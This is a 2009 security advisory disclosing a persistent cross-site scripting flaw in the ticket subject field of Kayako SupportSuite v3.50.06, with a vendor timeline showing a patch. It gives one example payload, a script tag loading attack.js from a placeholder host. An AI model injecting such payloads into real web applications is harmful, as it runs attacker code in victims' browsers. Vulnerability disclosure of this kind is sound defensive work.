nGenuity Information Services – Security Advisory Advisory ID: NGENUITY-2009-008 - Ticket Subject Persistent XSS in Kayako SupportSuite Application: SupportSuite v3.50.06 Vendor: Kayako Vendor website: http://www.kayako.com Author: Adam Baldwin (adam_baldwin@xxxxxxxxxxxxxxx) Class: Persistent Cross-Site Scripting I. BACKGROUND "SupportSuite is [Kayako's] flagship product, integrating the ticket and e-mail management features of eSupport with the live chat and visitor monitoring features of LiveResponse." [1] II. DETAILS The subject field of a newly created support ticket is not properly encoded before being sent to the browser when the ticket details are viewed. More information on cross-site scripting please refer to the Common Weakness Enumeration specification available cwe.mitre.org [2]. An example attack might look similar to the following. </title><script src="example.com/attack.js"></script> III. REFERENCES [1] - http://www.kayako.com [2] - http://cwe.mitre.org/data/definitions/79.html IV. VENDOR COMMUNICATION 7.17.2009 - Vulnerability Discovery 7.20.2009 - Initial Vendor Response 7.21.2009 - Patch created, Will be pushed to next stable release 8.08.2009 - Advisory released http://www.ngenuity.org/wordpress/2009/08/08/ngenuity-ticket-subject-persistent-xss-in-kayako-supportsuite/